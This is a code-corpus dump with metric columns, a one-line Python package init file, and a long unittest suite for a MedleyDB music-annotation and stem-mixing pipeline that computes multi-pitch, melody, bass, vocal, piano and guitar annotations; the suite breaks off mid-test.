| 0.695035
| 16
| 141
| 6
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.234043
| 141
| 9
| 46
| 15.666667
| 0.888889
| 0.22695
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0b73cb8219a3db90762cae657f1fe62ded68d6f2
| 29
|
py
|
Python
|
src/SDA_Turki/__init__.py
|
TurkiBt/SDA-Turki
|
b3b541ed7bfaf7099d28491a11872e7964fca858
|
[
"MIT"
] | null | null | null |
src/SDA_Turki/__init__.py
|
TurkiBt/SDA-Turki
|
b3b541ed7bfaf7099d28491a11872e7964fca858
|
[
"MIT"
] | null | null | null |
src/SDA_Turki/__init__.py
|
TurkiBt/SDA-Turki
|
b3b541ed7bfaf7099d28491a11872e7964fca858
|
[
"MIT"
] | null | null | null |
from .my_class import MyClass
| 29
| 29
| 0.862069
| 5
| 29
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0b82437b4d3ddd352067362346b6cd314e357711
| 38,515
|
py
|
Python
|
tests/test_compute_multitask_data.py
|
jollyjonson/multitask-f0
|
0f33475599bd69acce8cd9a1a96f20fc1c8b7701
|
[
"MIT"
] | 10
|
2019-01-08T02:31:12.000Z
|
2021-04-26T09:52:46.000Z
|
tests/test_compute_multitask_data.py
|
jollyjonson/multitask-f0
|
0f33475599bd69acce8cd9a1a96f20fc1c8b7701
|
[
"MIT"
] | 1
|
2019-03-11T18:12:07.000Z
|
2019-03-11T18:12:07.000Z
|
tests/test_compute_multitask_data.py
|
jollyjonson/multitask-f0
|
0f33475599bd69acce8cd9a1a96f20fc1c8b7701
|
[
"MIT"
] | 2
|
2019-03-11T12:23:08.000Z
|
2019-06-20T15:58:06.000Z
|
import unittest
import os
import numpy as np
import medleydb as mdb
from deepsalience import compute_multitask_data as CMD
class TestMultiF0ToTimeFreq(unittest.TestCase):
    """Tests for CMD.multif0_to_timefreq."""
    def test_default(self):
        # Frames with empty frequency lists are dropped, and frames with
        # multiple frequencies repeat their timestamp once per frequency,
        # yielding flat, parallel (times, freqs) lists.
        times = [0.0, 0.1, 0.2, 0.8]
        freqs = [[], [200.1, 207.7], [], [82.1]]
        actual_times, actual_freqs = CMD.multif0_to_timefreq(times, freqs)
        expected_times = [0.1, 0.1, 0.8]
        expected_freqs = [200.1, 207.7, 82.1]
        self.assertEqual(expected_times, actual_times)
        self.assertEqual(expected_freqs, actual_freqs)
class TestGetReplaceInfo(unittest.TestCase):
    """Tests for CMD.get_replace_info.

    NOTE(review): both tests point at a hard-coded absolute Dropbox path
    ('/Users/rabitt/...'), so they only run on that machine — consider a
    fixture path.
    """
    def test_one(self):
        # Track with one replaced stem: expect annotations, an alternate
        # file index, and the replaced stem index (2) to be returned.
        replace_path = os.path.join(
            "/Users/rabitt/Dropbox/piano_guitar_resynth",
            "vocalists_replace"
        )
        mtrack = mdb.MultiTrack('AHa_TakeOnMe')
        (actual_annotations,
         actual_altindices,
         actual_indicies) = CMD.get_replace_info(mtrack, replace_path)
        expected_annotations = {
            2: {
                'tags': ['multif0', 'vocal', 'melody'],
                'times': [11.104943311],
                'freqs': [150.758]
            }
        }
        expected_altindices = {
            2: os.path.join(replace_path, 'AHa_TakeOnMe_STEM_02_replace.wav')
        }
        expected_indices = [2]
        self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
        # Compare tags and the first time/freq entry per annotated stem.
        for k in actual_annotations.keys():
            self.assertEqual(
                expected_annotations[k]['tags'],
                actual_annotations[k]['tags']
            )
            self.assertEqual(
                expected_annotations[k]['times'][0],
                actual_annotations[k]['times'][0]
            )
            self.assertEqual(
                expected_annotations[k]['freqs'][0],
                actual_annotations[k]['freqs'][0]
            )
        self.assertEqual(expected_altindices, actual_altindices)
        self.assertEqual(expected_indices, actual_indicies)
    def test_two(self):
        # Track with no replaced stems: all three results are empty.
        mtrack = mdb.MultiTrack('ArcadeFire_BlackMirror')
        replace_path = os.path.join(
            "/Users/rabitt/Dropbox/piano_guitar_resynth",
            "vocalists_replace"
        )
        (actual_annotations,
         actual_altindices,
         actual_indicies) = CMD.get_replace_info(mtrack, replace_path)
        expected_annotations = {}
        expected_altindices = {}
        expected_indices = []
        self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
        # With an empty annotations dict this loop body never executes;
        # it is kept in parallel with test_one.
        for k in actual_annotations.keys():
            self.assertEqual(
                expected_annotations[k]['tags'],
                actual_annotations[k]['tags']
            )
            self.assertEqual(
                expected_annotations[k]['times'][0],
                actual_annotations[k]['times'][0]
            )
            self.assertEqual(
                expected_annotations[k]['freqs'][0],
                actual_annotations[k]['freqs'][0]
            )
        self.assertEqual(expected_altindices, actual_altindices)
        self.assertEqual(expected_indices, actual_indicies)
class TestGetResynthInfo(unittest.TestCase):
    """Tests for CMD.get_resynth_info, which splits resynthesized stems
    into guitar and piano groups and reports their annotations."""

    def _check_annotations(self, expected, actual):
        """Compare annotation dicts keyed by stem index; only the first
        time/freq entry per stem is spot-checked."""
        self.assertEqual(expected.keys(), actual.keys())
        for k in actual.keys():
            self.assertEqual(expected[k]['tags'], actual[k]['tags'])
            self.assertEqual(
                expected[k]['times'][0], actual[k]['times'][0])
            self.assertEqual(
                expected[k]['freqs'][0], actual[k]['freqs'][0])

    def test_one(self):
        resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
        mtrack = mdb.MultiTrack('AHa_TakeOnMe')
        (actual_annotations,
         actual_altindices,
         actual_indices_guitar,
         actual_indices_piano) = CMD.get_resynth_info(
             mtrack, resynth_path, [2])
        expected_annotations = {
            1: {
                'tags': ['multif0'],
                'times': [119.4550566893424],
                'freqs': [830.60939515989025]
            },
            3: {
                'tags': ['multif0'],
                'times': [11.435827664399094],
                'freqs': [123.47082531403103]
            },
            4: {
                'tags': ['multif0', 'guitar'],
                'times': [49.458503401360545],
                'freqs': [293.66476791740757]
            },
            6: {
                'tags': ['multif0'],
                'times': [5.5495691609977325],
                'freqs': [246.94165062806206]
            }
        }
        expected_altindices = {
            1: os.path.join(resynth_path, 'AHa_TakeOnMe_STEM_01_resynth.wav'),
            3: os.path.join(resynth_path, 'AHa_TakeOnMe_STEM_03_resynth.wav'),
            4: os.path.join(resynth_path, 'AHa_TakeOnMe_STEM_04_resynth.wav'),
            6: os.path.join(resynth_path, 'AHa_TakeOnMe_STEM_06_resynth.wav')
        }
        self._check_annotations(expected_annotations, actual_annotations)
        self.assertEqual(expected_altindices, actual_altindices)
        self.assertEqual([4], actual_indices_guitar)
        self.assertEqual([1, 3, 6], actual_indices_piano)

    def test_two(self):
        # Track with a single piano resynth stem and no guitar stems.
        resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
        mtrack = mdb.MultiTrack('Adele_SomeoneLikeYou')
        (actual_annotations,
         actual_altindices,
         actual_indices_guitar,
         actual_indices_piano) = CMD.get_resynth_info(
             mtrack, resynth_path, [2])
        expected_annotations = {
            1: {
                'tags': ['multif0', 'piano'],
                'times': [0.83591836734693881],
                'freqs': [164.81377845643496]
            }
        }
        expected_altindices = {
            1: os.path.join(
                resynth_path, 'Adele_SomeoneLikeYou_STEM_01_resynth.wav')
        }
        self._check_annotations(expected_annotations, actual_annotations)
        self.assertEqual(expected_altindices, actual_altindices)
        self.assertEqual([], actual_indices_guitar)
        self.assertEqual([1], actual_indices_piano)

    def test_three(self):
        # Two guitar resynth stems, no piano, empty excluded-stem list.
        mtrack = mdb.MultiTrack('ArcadeFire_BlackMirror')
        resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
        (actual_annotations,
         actual_altindices,
         actual_indices_guitar,
         actual_indices_piano) = CMD.get_resynth_info(
             mtrack, resynth_path, [])
        expected_annotations = {
            2: {
                'tags': ['multif0', 'guitar'],
                'times': [10.832108843537416],
                'freqs': [116.54094037952248]
            },
            7: {
                'tags': ['multif0', 'guitar'],
                'times': [11.122358276643991],
                'freqs': [116.54094037952248]
            }
        }
        expected_altindices = {
            2: os.path.join(
                resynth_path, 'ArcadeFire_BlackMirror_STEM_02_resynth.wav'),
            7: os.path.join(
                resynth_path, 'ArcadeFire_BlackMirror_STEM_07_resynth.wav')
        }
        self._check_annotations(expected_annotations, actual_annotations)
        self.assertEqual(expected_altindices, actual_altindices)
        self.assertEqual([2, 7], actual_indices_guitar)
        self.assertEqual([], actual_indices_piano)
class TestGetOrigStemInfo(unittest.TestCase):
    """Tests for CMD.get_orig_stem_info, which collects annotation and
    activity information for the non-resynthesized stems of a track."""

    def _check_annotations(self, expected, actual):
        """Compare annotation dicts keyed by stem index; only the first
        time/freq entry per stem is spot-checked."""
        self.assertEqual(expected.keys(), actual.keys())
        for k in actual.keys():
            self.assertEqual(expected[k]['tags'], actual[k]['tags'])
            self.assertEqual(
                expected[k]['times'][0], actual[k]['times'][0])
            self.assertEqual(
                expected[k]['freqs'][0], actual[k]['freqs'][0])

    def test_one(self):
        mtrack = mdb.MultiTrack('AcDc_BackInBlack')
        (actual_annotations,
         actual_annot_activity,
         actual_indices) = CMD.get_orig_stem_info(mtrack, [2, 4])
        expected_annotations = {
            3: {
                'tags': ['multif0', 'bass'],
                'times': [5.294149660],
                'freqs': [85.2297]
            },
            6: {
                'tags': ['multif0', 'vocal', 'melody'],
                'times': [25.094965986],
                'freqs': [689.325]
            }
        }
        self._check_annotations(expected_annotations, actual_annotations)
        self.assertEqual({3: None, 6: None}, actual_annot_activity)
        self.assertEqual([3, 5, 6], actual_indices)

    def test_two(self):
        mtrack = mdb.MultiTrack('ArcadeFire_BlackMirror')
        (actual_annotations,
         actual_annot_activity,
         actual_indices) = CMD.get_orig_stem_info(mtrack, [2, 7])
        expected_annotations = {
            4: {
                'tags': ['multif0', 'bass'],
                'times': [0.058049887],
                'freqs': [0.0]
            },
            6: {
                'tags': ['multif0', 'vocal', 'melody'],
                'times': [26.790022676],
                'freqs': [162.773]
            }
        }
        self._check_annotations(expected_annotations, actual_annotations)
        self.assertEqual({4: None, 6: None}, actual_annot_activity)
        self.assertEqual([3, 4, 6], actual_indices)

    def test_three(self):
        # Some stems also carry activity confidence arrays (stems 4 and 5).
        mtrack = mdb.MultiTrack('MusicDelta_BebopJazz')
        (actual_annotations,
         actual_annot_activity,
         actual_indices) = CMD.get_orig_stem_info(mtrack, [3])
        expected_annotations = {
            2: {
                'tags': ['multif0', 'bass'],
                'times': [0.632743764],
                'freqs': [86.5701]
            },
            4: {
                'tags': ['multif0', 'melody'],
                'times': [0.429569160],
                'freqs': [190.852]
            },
            5: {
                'tags': ['multif0', 'melody'],
                'times': [0.400544217],
                'freqs': [380.532]
            }
        }
        self._check_annotations(expected_annotations, actual_annotations)
        # Only the first activity value is spot-checked for stems 4 and 5.
        self.assertEqual(None, actual_annot_activity[2])
        self.assertEqual(0.5, actual_annot_activity[4][0])
        self.assertEqual(0.5, actual_annot_activity[5][0])
        self.assertEqual([1, 2, 4, 5], actual_indices)
class TestSaveAnnotation(unittest.TestCase):
    """Tests for CMD.save_annotation."""

    def test_empty(self):
        # With no data to write, nothing is saved and None is returned.
        result = CMD.save_annotation([], [], 'data/save_test.csv')
        self.assertIsNone(result)

    def test_nonempty(self):
        out_path = 'data/save_test.csv'
        result = CMD.save_annotation(
            [0.5, 0.5, 0.5, 1.5], [200.0, 0.0, 201, 400], out_path)
        self.assertEqual(out_path, result)
        self.assertTrue(os.path.exists(result))
        os.remove(result)
class TestCreateAnnotations(unittest.TestCase):
    """Test for CMD.create_annotations.

    Checks that per-stem annotations are merged into per-task annotation
    dicts (multif0 variants, melody, vocal, bass, piano, guitar), each
    with flattened times/freqs and a derived output path under save_dir.
    """
    def test_one(self):
        save_dir = 'asdf/fdasa'
        track_id = 'Artist_Title'
        # NOTE(review): the expected multif0 times interleave stems in the
        # order 1, 2, 3, 7, 9 — this appears to track the insertion order
        # of this dict literal (stem 1 last here but vocal-first in the
        # expectation); confirm against CMD.create_annotations before
        # reordering these keys.
        stem_annotations = {
            2: {
                'tags': ['multif0', 'bass'],
                'times': [0.0, 0.1, 0.2],
                'freqs': [100, 100, 100]
            },
            3: {
                'tags': ['multif0', 'piano'],
                'times': [0.0, 0.1, 0.2],
                'freqs': [200, 200, 200]
            },
            7: {
                'tags': ['multif0', 'guitar'],
                'times': [1.0, 1.0, 1.1, 1.2],
                'freqs': [100, 200, 100, 100]
            },
            9: {
                'tags': ['multif0', 'melody'],
                'times': [0.2, 0.3, 0.4],
                'freqs': [100, 100, 100]
            },
            1: {
                'tags': ['multif0', 'vocal'],
                'times': [1.0, 1.1, 1.2],
                'freqs': [400, 400, 400]
            }
        }
        actual = CMD.create_annotations(save_dir, track_id, stem_annotations)
        # Expected output: one entry per task; 'multif0_noguitar' drops the
        # guitar stem, 'multif0_nosynth' additionally drops piano.
        expected = {
            'multif0': {
                'times': [
                    1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.0, 0.1, 0.2,
                    1.0, 1.0, 1.1, 1.2, 0.2, 0.3, 0.4],
                'freqs': [
                    400, 400, 400, 100, 100, 100, 200, 200, 200,
                    100, 200, 100, 100, 100, 100, 100],
                'path': "asdf/fdasa/Artist_Title_multif0_annotation.txt"
            },
            'multif0_noguitar': {
                'times': [
                    1.0, 1.1, 1.2, 0.0, 0.1, 0.2,
                    0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
                'freqs': [
                    400, 400, 400, 100, 100, 100,
                    200, 200, 200, 100, 100, 100],
                'path':
                    "asdf/fdasa/Artist_Title_multif0_noguitar_annotation.txt"
            },
            'multif0_nosynth': {
                'times': [1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
                'freqs': [400, 400, 400, 100, 100, 100, 100, 100, 100],
                'path': "asdf/fdasa/Artist_Title_multif0_nosynth_annotation.txt"
            },
            'melody': {
                'times': [0.2, 0.3, 0.4],
                'freqs': [100, 100, 100],
                'path': "asdf/fdasa/Artist_Title_melody_annotation.txt"
            },
            'vocal': {
                'times': [1.0, 1.1, 1.2],
                'freqs': [400, 400, 400],
                'path': "asdf/fdasa/Artist_Title_vocal_annotation.txt"
            },
            'bass': {
                'times': [0.0, 0.1, 0.2],
                'freqs': [100, 100, 100],
                'path': "asdf/fdasa/Artist_Title_bass_annotation.txt"
            },
            'piano': {
                'times': [0.0, 0.1, 0.2],
                'freqs': [200, 200, 200],
                'path': "asdf/fdasa/Artist_Title_piano_annotation.txt"
            },
            'guitar': {
                'times': [1.0, 1.0, 1.1, 1.2],
                'freqs': [100, 200, 100, 100],
                'path': "asdf/fdasa/Artist_Title_guitar_annotation.txt"
            }
        }
        self.assertEqual(sorted(expected.keys()), sorted(actual.keys()))
        for key in actual.keys():
            self.assertEqual(expected[key], actual[key])
class TestCreateAnnotationSavePairs(unittest.TestCase):
    """Tests for CMD.create_annotation_save_pairs, which writes annotation
    files and maps each mix variant to its per-task annotation paths."""

    def _verify_pairs(self, expected, actual):
        """Compare the mix-path -> {task: annotation-path} mapping, assert
        each referenced annotation file was written, then delete them.

        Several mix variants may reference the same annotation file, so
        paths are deduplicated before removal.
        """
        self.assertEqual(sorted(expected.keys()), sorted(actual.keys()))
        files = []
        for key in actual.keys():
            self.assertEqual(
                sorted(expected[key].keys()), sorted(actual[key].keys()))
            for subkey in actual[key].keys():
                self.assertEqual(expected[key][subkey], actual[key][subkey])
                if actual[key][subkey] is not None:
                    self.assertTrue(os.path.exists(actual[key][subkey]))
                    files.append(actual[key][subkey])
        for fpath in set(files):
            os.remove(fpath)

    def test_one(self):
        annotations = {
            'multif0': {
                'times': [
                    1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.0, 0.1, 0.2,
                    1.0, 1.0, 1.1, 1.2, 0.2, 0.3, 0.4],
                'freqs': [
                    400, 400, 400, 100, 100, 100, 200, 200, 200,
                    100, 200, 100, 100, 100, 100, 100],
                'path': "data/Artist_Title_multif0_annotation.txt"
            },
            'multif0_noguitar': {
                'times': [
                    1.0, 1.1, 1.2, 0.0, 0.1, 0.2,
                    0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
                'freqs': [
                    400, 400, 400, 100, 100, 100,
                    200, 200, 200, 100, 100, 100],
                'path':
                    "data/Artist_Title_multif0_noguitar_annotation.txt"
            },
            'multif0_nosynth': {
                'times': [1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
                'freqs': [400, 400, 400, 100, 100, 100, 100, 100, 100],
                'path': "data/Artist_Title_multif0_nosynth_annotation.txt"
            },
            'melody': {
                'times': [0.2, 0.3, 0.4],
                'freqs': [100, 100, 100],
                'path': "data/Artist_Title_melody_annotation.txt"
            },
            'vocal': {
                'times': [1.0, 1.1, 1.2],
                'freqs': [400, 400, 400],
                'path': "data/Artist_Title_vocal_annotation.txt"
            },
            'bass': {
                'times': [0.0, 0.1, 0.2],
                'freqs': [100, 100, 100],
                'path': "data/Artist_Title_bass_annotation.txt"
            },
            'piano': {
                'times': [0.0, 0.1, 0.2],
                'freqs': [200, 200, 200],
                'path': "data/Artist_Title_piano_annotation.txt"
            },
            'guitar': {
                'times': [1.0, 1.0, 1.1, 1.2],
                'freqs': [100, 200, 100, 100],
                'path': "data/Artist_Title_guitar_annotation.txt"
            }
        }
        actual = CMD.create_annotation_save_pairs(
            annotations, 'Fakemix.wav', 'Fakemix_noguitar.wav',
            'Fakemix_nosynth.wav'
        )
        # noguitar/nosynth variants null out the stems they exclude.
        expected = {
            'Fakemix.wav': {
                'multif0': "data/Artist_Title_multif0_annotation.txt",
                'guitar': "data/Artist_Title_guitar_annotation.txt",
                'piano': "data/Artist_Title_piano_annotation.txt",
                'vocal': "data/Artist_Title_vocal_annotation.txt",
                'melody': "data/Artist_Title_melody_annotation.txt",
                'bass': "data/Artist_Title_bass_annotation.txt"
            },
            'Fakemix_noguitar.wav': {
                'multif0': "data/Artist_Title_multif0_noguitar_annotation.txt",
                'guitar': None,
                'piano': "data/Artist_Title_piano_annotation.txt",
                'vocal': "data/Artist_Title_vocal_annotation.txt",
                'melody': "data/Artist_Title_melody_annotation.txt",
                'bass': "data/Artist_Title_bass_annotation.txt"
            },
            'Fakemix_nosynth.wav': {
                'multif0': "data/Artist_Title_multif0_nosynth_annotation.txt",
                'guitar': None,
                'piano': None,
                'vocal': "data/Artist_Title_vocal_annotation.txt",
                'melody': "data/Artist_Title_melody_annotation.txt",
                'bass': "data/Artist_Title_bass_annotation.txt"
            },
        }
        self._verify_pairs(expected, actual)

    def test_two(self):
        # Same as test_one but with no 'bass' annotation present.
        annotations = {
            'multif0': {
                'times': [
                    1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.0, 0.1, 0.2,
                    1.0, 1.0, 1.1, 1.2, 0.2, 0.3, 0.4],
                'freqs': [
                    400, 400, 400, 100, 100, 100, 200, 200, 200,
                    100, 200, 100, 100, 100, 100, 100],
                'path': "data/Artist_Title_multif0_annotation.txt"
            },
            'multif0_noguitar': {
                'times': [
                    1.0, 1.1, 1.2, 0.0, 0.1, 0.2,
                    0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
                'freqs': [
                    400, 400, 400, 100, 100, 100,
                    200, 200, 200, 100, 100, 100],
                'path':
                    "data/Artist_Title_multif0_noguitar_annotation.txt"
            },
            'multif0_nosynth': {
                'times': [1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
                'freqs': [400, 400, 400, 100, 100, 100, 100, 100, 100],
                'path': "data/Artist_Title_multif0_nosynth_annotation.txt"
            },
            'melody': {
                'times': [0.2, 0.3, 0.4],
                'freqs': [100, 100, 100],
                'path': "data/Artist_Title_melody_annotation.txt"
            },
            'vocal': {
                'times': [1.0, 1.1, 1.2],
                'freqs': [400, 400, 400],
                'path': "data/Artist_Title_vocal_annotation.txt"
            },
            'piano': {
                'times': [0.0, 0.1, 0.2],
                'freqs': [200, 200, 200],
                'path': "data/Artist_Title_piano_annotation.txt"
            },
            'guitar': {
                'times': [1.0, 1.0, 1.1, 1.2],
                'freqs': [100, 200, 100, 100],
                'path': "data/Artist_Title_guitar_annotation.txt"
            }
        }
        actual = CMD.create_annotation_save_pairs(
            annotations, 'Fakemix.wav', 'Fakemix_noguitar.wav',
            'Fakemix_nosynth.wav'
        )
        expected = {
            'Fakemix.wav': {
                'multif0': "data/Artist_Title_multif0_annotation.txt",
                'guitar': "data/Artist_Title_guitar_annotation.txt",
                'piano': "data/Artist_Title_piano_annotation.txt",
                'vocal': "data/Artist_Title_vocal_annotation.txt",
                'melody': "data/Artist_Title_melody_annotation.txt"
            },
            'Fakemix_noguitar.wav': {
                'multif0': "data/Artist_Title_multif0_noguitar_annotation.txt",
                'guitar': None,
                'piano': "data/Artist_Title_piano_annotation.txt",
                'vocal': "data/Artist_Title_vocal_annotation.txt",
                'melody': "data/Artist_Title_melody_annotation.txt"
            },
            'Fakemix_nosynth.wav': {
                'multif0': "data/Artist_Title_multif0_nosynth_annotation.txt",
                'guitar': None,
                'piano': None,
                'vocal': "data/Artist_Title_vocal_annotation.txt",
                'melody': "data/Artist_Title_melody_annotation.txt"
            }
        }
        self._verify_pairs(expected, actual)
class TestGenerateFilteredStems(unittest.TestCase):
    """Tests for CMD.generate_filtered_stems."""

    def test_empty(self):
        # No activity info at all: nothing is generated.
        stem_annot_activity = {}
        mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
        actual = CMD.generate_filtered_stems(stem_annot_activity, mtrack, "")
        self.assertEqual({}, actual)

    def _check_nonempty(self, n_samples):
        """Run the nonempty case with an all-active annotation of
        n_samples samples on stem 2 (stem 1 has no activity, i.e. None,
        and must be skipped)."""
        stem_annot_activity = {1: None, 2: np.ones((n_samples, ))}
        mtrack = mdb.MultiTrack("MusicDelta_Reggae")
        out_path = 'data/MusicDelta_Reggae_STEM_2_alt.wav'
        actual = CMD.generate_filtered_stems(
            stem_annot_activity, mtrack, 'data')
        self.assertEqual({2: out_path}, actual)
        self.assertTrue(os.path.exists(out_path))
        os.remove(out_path)

    def test_nonempty_one(self):
        # Activity array longer than typical stem audio.
        self._check_nonempty(20 * 44100)

    def test_nonempty_two(self):
        # Activity array shorter than the stem audio.
        self._check_nonempty(2 * 44100)
class TestCreateMixes(unittest.TestCase):
    """Test for CMD.create_mixes: full, no-guitar and no-synth variants."""

    def test_one(self):
        mtrack = mdb.MultiTrack("AHa_TakeOnMe")
        mix_path = 'data/test_mix.wav'
        mix_path_noguitar = 'data/test_mix_noguitar.wav'
        mix_path_nosynth = 'data/test_mix_nosynth.wav'
        stem_indices = [1, 2, 3, 4, 5, 6]
        stem_indices_guitar = [4]
        stem_indices_piano = [1, 3, 6]
        resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
        replace_path = os.path.join(
            '/Users/rabitt/Dropbox',
            'piano_guitar_resynth/vocalists_replace'
        )
        # Alternate audio for every stem except 5, which keeps the
        # original MedleyDB stem audio.
        altfiles = {
            1: os.path.join(resynth_path, "AHa_TakeOnMe_STEM_01_resynth.wav"),
            2: os.path.join(replace_path, "AHa_TakeOnMe_STEM_02_replace.wav"),
            3: os.path.join(resynth_path, "AHa_TakeOnMe_STEM_03_resynth.wav"),
            4: os.path.join(resynth_path, "AHa_TakeOnMe_STEM_04_resynth.wav"),
            6: os.path.join(resynth_path, "AHa_TakeOnMe_STEM_06_resynth.wav")
        }
        (mix_files,
         mix_files_noguitar,
         mix_files_nosynth) = CMD.create_mixes(
            mtrack, mix_path, mix_path_noguitar, mix_path_nosynth,
            stem_indices, stem_indices_guitar, stem_indices_piano,
            altfiles
        )
        original_stem_05 = os.path.join(
            mdb.MEDLEYDB_PATH, 'Audio', 'AHa_TakeOnMe',
            'AHa_TakeOnMe_STEMS', "AHa_TakeOnMe_STEM_05.wav")
        expected_mix = sorted([
            os.path.join(resynth_path, "AHa_TakeOnMe_STEM_01_resynth.wav"),
            os.path.join(replace_path, "AHa_TakeOnMe_STEM_02_replace.wav"),
            os.path.join(resynth_path, "AHa_TakeOnMe_STEM_03_resynth.wav"),
            os.path.join(resynth_path, "AHa_TakeOnMe_STEM_04_resynth.wav"),
            original_stem_05,
            os.path.join(resynth_path, "AHa_TakeOnMe_STEM_06_resynth.wav")
        ])
        # no-guitar variant drops stem 4; no-synth drops all resynth stems.
        expected_mix_noguitar = sorted([
            os.path.join(resynth_path, "AHa_TakeOnMe_STEM_01_resynth.wav"),
            os.path.join(replace_path, "AHa_TakeOnMe_STEM_02_replace.wav"),
            os.path.join(resynth_path, "AHa_TakeOnMe_STEM_03_resynth.wav"),
            original_stem_05,
            os.path.join(resynth_path, "AHa_TakeOnMe_STEM_06_resynth.wav")
        ])
        expected_mix_nosynth = sorted([
            os.path.join(replace_path, "AHa_TakeOnMe_STEM_02_replace.wav"),
            original_stem_05,
        ])
        self.assertEqual(expected_mix, sorted(mix_files))
        self.assertEqual(expected_mix_noguitar, sorted(mix_files_noguitar))
        self.assertEqual(expected_mix_nosynth, sorted(mix_files_nosynth))
        for path in (mix_path, mix_path_noguitar, mix_path_nosynth):
            self.assertTrue(os.path.exists(path))
            os.remove(path)
class TestCreateCompleteResynthMix(unittest.TestCase):
    """Test for CMD.create_complete_resynth_mix."""

    def test_one(self):
        mtrack = mdb.MultiTrack("AHa_TakeOnMe")
        resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
        replace_path = os.path.join(
            '/Users/rabitt/Dropbox',
            'piano_guitar_resynth/vocalists_replace'
        )
        result = CMD.create_complete_resynth_mix(
            mtrack, resynth_path, replace_path, 'data')
        expected = {
            "data/AHa_TakeOnMe_MIX_complete_resynth.wav": {
                'multif0': "data/AHa_TakeOnMe_multif0_annotation.txt",
                'guitar': "data/AHa_TakeOnMe_guitar_annotation.txt",
                'piano': None,
                'vocal': "data/AHa_TakeOnMe_vocal_annotation.txt",
                'melody': "data/AHa_TakeOnMe_melody_annotation.txt",
                'bass': None
            },
            "data/AHa_TakeOnMe_MIX_complete_noguitar.wav": {
                'multif0': "data/AHa_TakeOnMe_multif0_noguitar_annotation.txt",
                'guitar': None,
                'piano': None,
                'vocal': "data/AHa_TakeOnMe_vocal_annotation.txt",
                'melody': "data/AHa_TakeOnMe_melody_annotation.txt",
                'bass': None
            },
            "data/AHa_TakeOnMe_MIX_complete_nosynth.wav": {
                'multif0': "data/AHa_TakeOnMe_multif0_nosynth_annotation.txt",
                'guitar': None,
                'piano': None,
                'vocal': "data/AHa_TakeOnMe_vocal_annotation.txt",
                'melody': "data/AHa_TakeOnMe_melody_annotation.txt",
                'bass': None
            }
        }
        self.assertEqual(sorted(expected.keys()), sorted(result.keys()))
        annotation_files = set()
        for mix_file, annots in result.items():
            self.assertEqual(
                sorted(expected[mix_file].keys()), sorted(annots.keys()))
            # Each mix variant must have been written to disk.
            self.assertTrue(os.path.exists(mix_file))
            os.remove(mix_file)
            for task, annot_path in annots.items():
                self.assertEqual(expected[mix_file][task], annot_path)
                if annot_path is not None:
                    self.assertTrue(os.path.exists(annot_path))
                    annotation_files.add(annot_path)
        # Annotation files can be shared between mixes; remove each once.
        for fpath in annotation_files:
            os.remove(fpath)
class TestGetAnnotationMono(unittest.TestCase):
    """Tests for CMD.get_annotation_mono."""

    @staticmethod
    def _stems(mtrack, indices):
        """Look up stem objects for the given stem indices."""
        return [mtrack.stems[i] for i in indices]

    def test_empty_list(self):
        mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
        times, freqs = CMD.get_annotation_mono(
            mtrack, self._stems(mtrack, []))
        self.assertEqual([], times)
        self.assertEqual([], freqs)

    def test_nonempty_list_one(self):
        mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
        times, freqs = CMD.get_annotation_mono(
            mtrack, self._stems(mtrack, [4, 5]))
        # Only the first merged time/freq value is spot-checked.
        self.assertEqual(0.39473922900000002, times[0])
        self.assertEqual(193.88999999999999, freqs[0])

    def test_nonempty_list_two(self):
        # NOTE(review): with stems [3, 4, 5] the function returns
        # (None, None) — presumably stem 3 is not mono-annotated; confirm.
        mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
        times, freqs = CMD.get_annotation_mono(
            mtrack, self._stems(mtrack, [3, 4, 5]))
        self.assertIsNone(times)
        self.assertIsNone(freqs)
class TestGetFullmixAnnotation(unittest.TestCase):
    """Tests for CMD.get_fullmix_annotations across tracks with different
    combinations of available vocal/bass/melody annotations."""

    def _verify(self, expected, actual):
        """Compare the mix-path -> {task: annotation-path} mapping, check
        that every non-None annotation file exists, and clean up."""
        self.assertEqual(sorted(expected.keys()), sorted(actual.keys()))
        files = []
        for key in actual.keys():
            self.assertEqual(
                sorted(expected[key].keys()), sorted(actual[key].keys()))
            for subkey in actual[key].keys():
